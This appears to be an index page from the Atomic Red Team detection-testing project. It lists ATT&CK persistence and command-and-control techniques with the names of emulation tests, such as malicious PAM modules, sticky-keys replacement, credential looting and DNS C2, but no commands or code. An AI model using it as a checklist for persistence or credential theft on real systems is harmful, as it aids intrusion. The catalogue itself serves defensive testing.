- T1156 Malicious Shell Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1067 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1161 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1150 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
- Atomic Test #1: Malicious PAM rule [linux]
- Atomic Test #2: Malicious PAM module [linux]
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1044 File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.013 Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md)
- Atomic Test #1: Append malicious start-process cmdlet [windows]
- T1501 Systemd Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1133 External Remote Services](../../T1133/T1133.md)
- Atomic Test #1: Running Chrome VPN Extensions via the Registry 2 vpn extension [windows]
- T1109 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.007 Kubernetes Cronjob](../../T1053.007/T1053.007.md)
- Atomic Test #1: ListCronjobs [containers]
- Atomic Test #2: CreateCronjob [containers]
- T1542.001 System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
- Atomic Test #1: Service Registry Permissions Weakness [windows]
- Atomic Test #2: Service ImagePath Change with reg.exe [windows]
- T1163 Rc.common [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547 Boot or Logon Autostart Execution](../../T1547/T1547.md)
- Atomic Test #1: Add a driver [windows]
- T1013 Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.014 Active Setup](../../T1547.014/T1547.014.md)
- Atomic Test #1: HKLM - Add atomic_test key to launch executable as part of user setup [windows]
- Atomic Test #2: HKLM - Add malicious StubPath value to existing Active Setup Entry [windows]
- Atomic Test #3: HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number [windows]
- T1180 Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1543.003 Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md)
- Atomic Test #1: Modify Fax service to run PowerShell [windows]
- Atomic Test #2: Service Installation CMD [windows]
- Atomic Test #3: Service Installation PowerShell [windows]
- Atomic Test #4: TinyTurla backdoor service w64time [windows]
- Atomic Test #5: Remote Service Installation CMD [windows]
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
- T1165 Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1137 Office Application Startup](../../T1137/T1137.md)
- Atomic Test #1: Office Application Startup - Outlook as a C2 [windows]
- T1098.003 Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.012 Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.001 Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- T1103 AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1137.006 Office Application Startup: Add-ins](../../T1137.006/T1137.006.md)
- Atomic Test #1: Code Executed Via Excel Add-in File (XLL) [windows]
- Atomic Test #2: Persistent Code Execution Via Excel Add-in File (XLL) [windows]
- Atomic Test #3: Persistent Code Execution Via Word Add-in File (WLL) [windows]
- Atomic Test #4: Persistent Code Execution Via Excel VBA Add-in File (XLAM) [windows]
- Atomic Test #5: Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM) [windows]
- [T1505.002 Server Software Component: Transport Agent](../../T1505.002/T1505.002.md)
- Atomic Test #1: Install MS Exchange Transport Agent Persistence [windows]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1162 Login Item [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.002 Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md)
- Atomic Test #1: Install and Register Password Filter DLL [windows]
- [T1505.005 Server Software Component: Terminal Services DLL](../../T1505.005/T1505.005.md)
- Atomic Test #1: Simulate Patching termsrv.dll [windows]
- [T1176 Browser Extensions](../../T1176/T1176.md)
- Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
- Atomic Test #5: Google Chrome Load Unpacked Extension With Command Line [windows]
- T1058 Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.011 Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md)
- Atomic Test #1: Application Shim Installation [windows]
- Atomic Test #2: New shim database files created in the default shim database directory [windows]
- Atomic Test #3: Registry key creation and/or modification events for SDB [windows]
- [T1547.010 Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md)
- Atomic Test #1: Add Port Monitor persistence in Registry [windows]
- [T1037.002 Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md)
- Atomic Test #1: Logon Scripts - Mac [macos]
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1050 New Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.009 Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md)
- Atomic Test #1: Shortcut Modification [windows]
- Atomic Test #2: Create shortcut to cmd in startup folders [windows]
- T1062 Hypervisor [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1182 AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1525 Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.005 Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md)
- Atomic Test #1: Modify SSP configuration in registry [windows]
- T1004 Winlogon Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1131 Authentication Package [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1152 Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1543.004 Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md)
- Atomic Test #1: Launch Daemon [macos]
- [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
- Atomic Test #1: PowerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
- [T1505.003 Server Software Component: Web Shell](../../T1505.003/T1505.003.md)
- Atomic Test #1: Web Shell Written to Disk [windows]
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
- Atomic Test #2: Activate Guest Account [windows]
- Atomic Test #3: Enable Guest Account on macOS [macos]
- [T1547.003 Time Providers](../../T1547.003/T1547.003.md)
- Atomic Test #1: Create a new time provider [windows]
- Atomic Test #2: Edit an existing time provider [windows]
- T1183 Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1031 Modify Existing Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap EXIT [macos, linux]
- Atomic Test #2: Trap SIGINT [macos, linux]
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
- Atomic Test #3: Dylib Injection via DYLD_INSERT_LIBRARIES [macos]
- [T1136.001 Create Account: Local Account](../../T1136.001/T1136.001.md)
- Atomic Test #1: Create a user account on a Linux system [linux]
- Atomic Test #2: Create a user account on a MacOS system [macos]
- Atomic Test #3: Create a new user in a command prompt [windows]
- Atomic Test #4: Create a new user in PowerShell [windows]
- Atomic Test #5: Create a new user in Linux with `root` UID and GID. [linux]
- Atomic Test #6: Create a new Windows admin user [windows]
- T1053.001 At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1179 Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.011 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md)
- Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
- Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
- Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows]
- Atomic Test #4: Winlogon HKLM Shell Key Persistence - PowerShell [windows]
- Atomic Test #5: Winlogon HKLM Userinit Key Persistence - PowerShell [windows]
- T1019 System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1042 Change Default File Association [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1164 Re-opened Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
- Atomic Test #1: Modify SSH Authorized Keys [macos, linux]
- T1215 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1101 Security Support Provider [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.012 Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md)
- Atomic Test #1: IFEO Add Debugger [windows]
- Atomic Test #2: IFEO Global Flags [windows]
- Atomic Test #3: GlobalFlags in Image File Execution Options [windows]
- T1177 LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.008 Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md)
- Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
- Atomic Test #2: Replace binary of sticky keys [windows]
- Atomic Test #3: Create Symbolic Link From osk.exe to cmd.exe [windows]
- T1504 PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1198 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1136.002 Create Account: Domain Account](../../T1136.002/T1136.002.md)
- Atomic Test #1: Create a new Windows domain admin user [windows]
- Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
- Atomic Test #3: Create a new Domain Account using PowerShell [windows]
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1138 Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.009 Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md)
- Atomic Test #1: Create registry persistence via AppCert DLL [windows]
- T1098.005 Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.015 Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md)
- Atomic Test #1: Persistence by modifying Windows Terminal profile [windows]
- Atomic Test #2: Add macOS LoginItem using Applescript [macos]
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1098.001 Account Manipulation: Additional Cloud Credentials](../../T1098.001/T1098.001.md)
- Atomic Test #1: Azure AD Application Hijacking - Service Principal [azure-ad]
- Atomic Test #2: Azure AD Application Hijacking - App Registration [azure-ad]
- Atomic Test #3: AWS - Create Access Key and Secret Key [iaas:aws]
- T1053.004 Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md)
- Atomic Test #1: Persistence via WMI Event Subscription - CommandLineEventConsumer [windows]
- Atomic Test #2: Persistence via WMI Event Subscription - ActiveScriptEventConsumer [windows]
- Atomic Test #3: Windows MOFComp.exe Load MOF File [windows]
- T1060 Registry Run Keys / Startup Folder [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1023 Shortcut Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.001 Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md)
- Atomic Test #1: Change Default File Association [windows]
- T1122 Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1015 Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.014 Event Triggered Execution: Emond](../../T1546.014/T1546.014.md)
- Atomic Test #1: Persistence with Event Monitor - emond [macos]
- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md)
- Atomic Test #1: Reg Key Run [windows]
- Atomic Test #2: Reg Key RunOnce [windows]
- Atomic Test #3: PowerShell Registry RunOnce [windows]
- Atomic Test #4: Suspicious vbs file run from startup Folder [windows]
- Atomic Test #5: Suspicious jse file run from startup Folder [windows]
- Atomic Test #6: Suspicious bat file run from startup Folder [windows]
- Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows]
- Atomic Test #8: Add persistence via Recycle Bin [windows]
- Atomic Test #9: SystemBC Malware-as-a-Service Registry [windows]
- Atomic Test #10: Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value [windows]
- Atomic Test #11: Change Startup Folder - HKCU Modify User Shell Folders Startup Value [windows]
- Atomic Test #12: HKCU - Policy Settings Explorer Run Key [windows]
- Atomic Test #13: HKLM - Policy Settings Explorer Run Key [windows]
- Atomic Test #14: HKLM - Append Command to Winlogon Userinit KEY Value [windows]
- Atomic Test #15: HKLM - Modify default System Shell - Winlogon Shell KEY Value [windows]
- Atomic Test #16: secedit used to create a Run key in the HKLM Hive [windows]
- Atomic Test #17: Modify BootExecute Value [windows]
- [T1136.003 Create Account: Cloud Account](../../T1136.003/T1136.003.md)
- Atomic Test #1: AWS - Create a new IAM user [iaas:aws]
- Atomic Test #2: Azure AD - Create a new user [azure-ad]
- Atomic Test #3: Azure AD - Create a new user via Azure CLI [azure-ad]
- [T1098 Account Manipulation](../../T1098/T1098.md)
- Atomic Test #1: Admin Account Manipulate [windows]
- Atomic Test #2: Domain Account and Group Manipulate [windows]
- Atomic Test #3: AWS - Create a group and add a user to that group [iaas:aws]
- Atomic Test #4: Azure AD - adding user to Azure AD role [azure-ad]
- Atomic Test #5: Azure AD - adding service principal to Azure AD role [azure-ad]
- Atomic Test #6: Azure - adding user to Azure role in subscription [iaas:azure]
- Atomic Test #7: Azure - adding service principal to Azure role in subscription [iaas:azure]
- Atomic Test #8: Azure AD - adding permission to application [azure-ad]
- Atomic Test #9: Password Change on Directory Service Restore Mode (DSRM) Account [windows]
- Atomic Test #10: Domain Password Policy Check: Short Password [windows]
- Atomic Test #11: Domain Password Policy Check: No Number in Password [windows]
- Atomic Test #12: Domain Password Policy Check: No Special Character in Password [windows]
- Atomic Test #13: Domain Password Policy Check: No Uppercase Character in Password [windows]
- Atomic Test #14: Domain Password Policy Check: No Lowercase Character in Password [windows]
- Atomic Test #15: Domain Password Policy Check: Only Two Character Classes [windows]
- Atomic Test #16: Domain Password Policy Check: Common Password Use [windows]
- [T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
- Atomic Test #1: Linux - Load Kernel Module via insmod [linux]
- Atomic Test #2: MacOS - Load Kernel Module via kextload and kmutil [macos]
- Atomic Test #3: MacOS - Load Kernel Module via KextManagerLoadKextWithURL() [macos]
- Atomic Test #4: Snake Malware Kernel Driver Comadmin [windows]
- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.006 Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md)
- Atomic Test #1: Create Systemd Service and Timer [linux]
- Atomic Test #2: Create a user level transient systemd service and timer [linux]
- Atomic Test #3: Create a system level transient systemd service and timer [linux]
- T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1157 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1505.004 IIS Components](../../T1505.004/T1505.004.md)
- Atomic Test #1: Install IIS Module using AppCmd.exe [windows]
- Atomic Test #2: Install IIS Module using PowerShell Cmdlet New-WebGlobalModule [windows]
- T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546 Event Triggered Execution](../../T1546/T1546.md)
- Atomic Test #1: Persistence with Custom AutodialDLL [windows]
- Atomic Test #2: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
- Atomic Test #3: HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation) [windows]
- Atomic Test #4: WMI Invoke-CimMethod Start Process [windows]
- [T1546.004 Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- Atomic Test #3: Append to the system shell profile [linux]
- Atomic Test #4: Append commands user shell profile [linux]
- Atomic Test #5: System shell profile scripts [linux]
- Atomic Test #6: Create/Append to .bash_logout [linux]
- [T1547.002 Authentication Package](../../T1547.002/T1547.002.md)
- Atomic Test #1: Authentication Package [windows]
- T1128 Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.015 Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md)
- Atomic Test #1: COM Hijacking - InprocServer32 [windows]
- Atomic Test #2: Powershell Execute COM Object [windows]
- Atomic Test #3: COM Hijacking with RunDLL32 (Local Server Switch) [windows]
- Atomic Test #4: COM hijacking via TreatAs [windows]
- [T1137.004 Office Application Startup: Outlook Home Page](../../T1137.004/T1137.004.md)
- Atomic Test #1: Install Outlook Home Page Persistence [windows]
- [T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- T1168 Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1166 Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.005 Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md)
- Atomic Test #1: Add file to Local Library StartupItems [macos]
- T1100 Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1034 Path Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1197 BITS Jobs](../../T1197/T1197.md)
- Atomic Test #1: Bitsadmin Download (cmd) [windows]
- Atomic Test #2: Bitsadmin Download (PowerShell) [windows]
- Atomic Test #3: Persist, Download, & Execute [windows]
- Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows]
- [T1546.010 Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md)
- Atomic Test #1: Install AppInit Shim [windows]
- [T1546.002 Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md)
- Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
- [T1543.001 Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md)
- Atomic Test #1: Launch Agent [macos]
- Atomic Test #2: Event Monitor Daemon Persistence [macos]
- T1519 Emond [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.004 Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md)
- Atomic Test #1: rc.common [macos]
- Atomic Test #2: rc.common [linux]
- Atomic Test #3: rc.local [linux]
- T1209 Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1159 Launch Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1543.002 Create or Modify System Process: Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
- Atomic Test #2: Create Systemd Service file, Enable the service, Modify and Reload the service. [linux]
- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.007 Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md)
- Atomic Test #1: Copy in loginwindow.plist for Re-Opened Applications [macos]
- Atomic Test #2: Re-Opened Applications using LoginHook [macos]
- Atomic Test #3: Append to existing loginwindow for Re-Opened Applications [macos]
- [T1574.002 Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows]
- T1098.002 Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1084 Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1160 Launch Daemon [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md)
- Atomic Test #1: Logon Scripts [windows]
- [T1137.002 Office Application Startup: Office Test](../../T1137.002/T1137.002.md)
- Atomic Test #1: Office Application Startup Test Persistence (HKCU) [windows]
- [T1547.008 Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md)
- Atomic Test #1: Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt [windows]
- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
- Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
- Atomic Test #1: At.exe Scheduled task [windows]
- Atomic Test #2: At - Schedule a job [linux]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.007 Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md)
- Atomic Test #1: Netsh Helper DLL Registration [windows]
- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #1: Create local account with admin privileges [windows]
- Atomic Test #2: Create local account with admin privileges - MacOS [macos]
- Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
- Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
- Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
- Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
- Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
- Atomic Test #8: Create local account (Linux) [linux]
- Atomic Test #9: Reactivate a locked/expired account (Linux) [linux]
- Atomic Test #10: Login as nobody (Linux) [linux]
- [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
- Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
# command-and-control
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1132.001 Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md)
- Atomic Test #1: Base64 Encoded data. [macos, linux]
- Atomic Test #2: XOR Encoded data. [windows]
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1071.004 Application Layer Protocol: DNS](../../T1071.004/T1071.004.md)
- Atomic Test #1: DNS Large Query Volume [windows]
- Atomic Test #2: DNS Regular Beaconing [windows]
- Atomic Test #3: DNS Long Domain Query [windows]
- Atomic Test #4: DNS C2 [windows]
